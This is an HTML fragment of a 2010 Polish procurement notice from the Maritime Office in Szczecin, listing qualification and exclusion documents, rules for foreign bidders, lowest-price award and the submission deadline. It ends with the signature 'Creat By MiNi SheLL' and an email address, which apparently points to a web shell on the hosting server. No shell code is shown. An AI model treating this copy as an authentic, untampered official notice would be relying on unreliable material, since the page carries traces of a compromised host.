<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ums.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Morski w Szczecinie
Zespół ds. Zamówień Publicznych, pokój nr 110
Plac Batorego 4, 70-207 Szczecin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.11.2010 godzina 10:30, miejsce: Urząd Morski w Szczecinie
Zespół ds. Zamówień Publicznych, pokój nr 110
Plac Batorego 4, 70-207 Szczecin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com